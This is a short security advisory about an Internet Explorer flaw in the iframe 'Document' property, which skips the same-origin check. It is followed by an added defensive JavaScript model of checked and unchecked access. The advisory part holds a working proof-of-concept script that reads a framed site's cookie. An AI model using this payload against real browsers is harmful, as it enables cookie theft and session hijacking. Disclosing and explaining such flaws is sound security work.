The <iframe> and <frame> elements are really instances of the WebBrowser control supplied by Microsoft. The WebBrowser control exposes several potentially dangerous properties by default, which Microsoft overrides in Internet Explorer.

However, Microsoft missed one important property -- "Document", with a capital "D".

Exploit:

This exploit demonstrates how an attacker may choose to read the client's "google.com" cookie.

<script language="jscript">
onload=function () {
    // Timer necessary to prevent weird behavior in some conditions
    setTimeout(
        function () {
            alert(document.getElementById("oVictim").Document.cookie);
        },
        100
    );
}
</script>
<iframe src="http://google.com" id="oVictim"></iframe>

Normally, using "oElement.document" provides a reference to the document that owns the current element, and the same applies to the <frame> and <iframe> elements. However, we discovered that when "oIFrameElement.Document" is used, the returned document is the one contained inside the frame, and no security check is made on whether that document belongs to a different domain.

This provides free and full access to the frame's Document Object Model, which allows an attacker to steal cookies from any site, gain access to content in sites (forging content), read local files and execute arbitrary programs on the client's machine (script in the "My Computer" zone).
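To make the root cause concrete, here is an added example (not code from the original advisory) that models the two accessors side by side: an unchecked property that returns the framed document outright, as the capital-D "Document" property did, and a checked property that compares the embedding page's origin with the framed page's origin before handing the document back, as a browser enforcing the same-origin policy does for contentDocument. The frame objects, URLs and cookie value are constructed for the demonstration; originOf, sameOrigin, makeFrame, uncheckedDocument and checkedDocument are names assumed here, not browser APIs.

```javascript
// Added example: modelling the missing same-origin check behind the
// iframe "Document" property. Nothing here is the advisory's own code.

// An origin is the (scheme, host, port) tuple; two URLs share an origin
// only when all three match. Default ports are normalised so that
// "http://google.com/" and "http://google.com:80/" compare equal.
function defaultPort(protocol) {
  if (protocol === "https:") return "443";
  if (protocol === "http:") return "80";
  return "";
}

function originOf(urlString) {
  const u = new URL(urlString);
  return `${u.protocol}//${u.hostname}:${u.port || defaultPort(u.protocol)}`;
}

function sameOrigin(urlA, urlB) {
  return originOf(urlA) === originOf(urlB);
}

// A toy frame: where the embedding page lives, where the framed page lives,
// and the framed page's document (constructed sample data, not a real page).
function makeFrame(parentUrl, frameUrl, frameDocument) {
  return { parentUrl, frameUrl, frameDocument };
}

// Unchecked accessor: the behaviour the advisory describes. The inner
// document is returned regardless of which domain it came from.
function uncheckedDocument(frame) {
  return frame.frameDocument;
}

// Checked accessor: what a correct property must do. A cross-origin frame
// yields null instead of its document, so the cookie never reaches the
// embedding page's script.
function checkedDocument(frame) {
  if (!sameOrigin(frame.parentUrl, frame.frameUrl)) {
    return null;
  }
  return frame.frameDocument;
}

// Demonstration with a constructed cross-origin frame and a constructed cookie.
function demo() {
  const frame = makeFrame(
    "http://attacker.example/page.html",   // constructed embedding page
    "http://google.com/",                  // framed page from the advisory
    { cookie: "SID=constructed-sample-value" }
  );
  const leaked = uncheckedDocument(frame);        // document object leaks
  const blocked = checkedDocument(frame);         // null: access refused
  return { leakedCookie: leaked.cookie, blocked: blocked === null };
}

console.log(demo());
```

The checked accessor refuses access on any origin mismatch, including a scheme change (http versus https) or a non-default port, which is exactly the comparison the vulnerable property skipped.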